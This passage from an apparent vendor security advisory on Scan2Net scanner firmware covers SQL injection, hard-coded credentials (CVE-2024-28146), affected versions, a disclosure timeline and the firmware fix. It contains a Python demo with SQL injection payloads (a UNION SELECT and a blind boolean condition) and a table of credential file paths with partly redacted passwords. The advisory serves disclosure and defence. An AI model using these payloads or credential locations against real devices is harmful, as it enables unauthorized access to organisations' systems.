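    return conn.execute(sql, names).fetchall()


if __name__ == "__main__":
    conn = build_db()
    injected_field = "configuration_name UNION ALL SELECT sqlite_version()-- -"
    print(getdbvalue_vulnerable(conn, "singlemode", "user_touchscreen", injected_field, "ScanWizard"))
    print(getdbvalue_safe(conn, "singlemode", "user_touchscreen", "configuration_name", "ScanWizard"))
    false_cond = '{"0":"default\' AND 1337=1336-- A"}'
    print(len(export_templates_vulnerable(conn, "printer", false_cond)),
          len(export_templates_safe(conn, "printer", false_cond)))
```

The safe export returns no rows for the injected name simply because no template is literally called that, while the vulnerable one returns no rows because the database evaluated the attacker's condition; only the second leaks information.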

9) Hard-coded Credentials (CVE-2024-28146)

After obtaining root access to the scanner, the system could be examined and checked for hard-coded credentials. The found credentials are used to encrypt config files during backup, decrypt the new firmware during an update and some of the listed passwords allow a direct connection to the database server of the scanner. 

| File                                | Usage                         | Username | Password      |
| ----------------------------------- | ----------------------------- | -------- | ------------- |
| /opt/s2n/www/cgi/infoio.cgi         | Encryption of exported config | -        | !Ba[REDACTED] |
| /opt/s2n/www/cgi/sysupd-1           | Encryption of firmware update | -        | Gle[REDACTED] |
| /opt/s2n/www/cgi/sysupd-2           | Encryption of firmware update | -        | Gli[REDACTED] |
| /opt/s2n/www/cgi/sysupd-3           | Encryption of firmware update | -        | Bet[REDACTED] |
| /opt/s2n/www/cgi/sysupd-7           | Encryption of firmware update | -        | 201[REDACTED] |
| /opt/s2n/www/class/LocaleImport.php | login for database            | support  | HDD[REDACTED] |
| /opt/s2n/www/class/DBmysqli.php     | login for database            | s2n      | fsc[REDACTED] |
| /opt/s2n/www/class/dbconnect.php    | login for database            | mysql    | MK2[REDACTED] |

Vulnerable / tested versions

The following version, which was the latest available at the time of the test in 2023, has been tested:

  • Firmware 7.31L on a WideTEK 36CL-600 Scanner

All versions of Scan2Net before 7.40, as used in WideTEK and Bookeye scanners, are affected.

SEC Consult was provided access to a patched scanner device by the vendor with firmware 7.40 in March 2024. It was briefly verified whether the security issues were properly fixed, but it was identified that most security issues are still present in the latest version.

Furthermore, the most recent firmware version 7.42 was rechecked in October 2024. Most critical security issues have been fixed, but some issues are still open.

Vendor contact timeline

2023-06-22 Penetration test at our customer is done, we offer to start the responsible disclosure process with the vendor. Customer wants to do the responsible disclosure process themselves.
2023-07-10 We ask if there is an update from the vendor; Customer informs us that there is no update yet.
2023-07-10 Customer informs us that the vendor is cooperative and working on a timeline for the remediation of the vulnerabilities.
2023-09-18 Because of an unrelated project we ask the customer if we should start a responsible disclosure process for that other project; Customer wants us to do the responsible disclosure process because they are currently lacking the resources to do it themselves. This also includes yet another, unrelated, older project; We ask if we should also start a responsible disclosure process for <this> project.
2023-09-22 Customer gives us permission for this project as well.
2023-11-28 Contacting vendor via support@imageaccess.de; no response.
2023-12-18 Contacting vendor again via support@imageaccess.de
2023-12-21 Support requests device name, serial number and firmware version.
2023-12-22 We provide the device name and firmware version, don't have serial number; no response from vendor.
2024-01-17 Asking vendor again where to send the advisory, if encryption is supported; no response.
2024-02-07 Submitting this case to German CERT-Bund/BSI via CVD including advisory details.
2024-02-09 Response from CERT-Bund, trying to establish contact with vendor.
2024-02-19 Response from CERT-Bund, vendor provides version 7.40 which fixes the issues.
2024-02-19 Asking whether the advisory was sent to the vendor by CERT-Bund, trying to clarify how to verify the fix and which devices and firmware versions are affected. Preparing CVE reservation.
2024-03-04 Vendor responds to CERT-Bund and keeps SEC Consult in CC. Users can download the firmware themselves via the download page.
2024-03-05 Asking about affected devices (Scan2net WideTEK, Bookeye, etc). Reserving CVE numbers and sending them to vendor.
2024-03-12 Detailed vendor response, providing internet-facing test device to verify the latest firmware version 7.40.
2024-03-25 Briefly verifying latest firmware version, most security issues still present. Updating security advisory.
2024-04-02 Sending updated advisory to vendor, asking for a meeting. No response.
2024-04-12 Asking whether email was received and to schedule a meeting.
2024-04-16 Productive conference call, further explained open security issues, updated firmware version scheduled for mid May.
2024-05-23 Asking for a status update. No response.
2024-06-11 Asking for a status update again. Vendor informs that new version should be available by end of the week.
2024-06-18 Vendor informs us that new version is available and should fix all reported issues.
2024-09-26 Requesting access to test system again to verify fix (delay because of longer vacation period)
2024-09-26 Quick vendor response, providing access to test system again.
2024-09-27 Apologizing for delay because of vacations/absences, recheck will be performed soon.
2024-09-27 Vendor provides updated version information, latest version is currently v7.42.
2024-10-14 Recheck of latest firmware version.
2024-10-15 Informing vendor about the open issues, providing current draft advisory. Asking about next steps/accepted risks.
2024-10-28 Asking for a status update.
2024-11-11 Asking for a status update.
2024-11-12 Vendor tells us that 7.42B should fix the newest XSS. We state that we no longer have capacities for further rechecks.
2024-11-29 Sending latest advisory draft to vendor, proposing release date for 2024-12-04. Vendor accepts the publication date and mentions that they want to release a bugfix for issue #7 this week.
2024-12-04 Public disclosure of security advisory.

Solution

The vendor provides a firmware update to version 7.42B which can be downloaded via the vendor's customer server portal:

https://www.imageaccess.de/?page=SupportPortal&lang=en

This version fixes most of the identified issues. Only a few issues remain, where the vendor has accepted the risk or is going to patch it in the future.

Workaround

None

Advisory URL

https://r.sec-consult.com/imageaccess


EOF Daniel Hirschberger, Tobias Niemann, Johannes Greil / @2024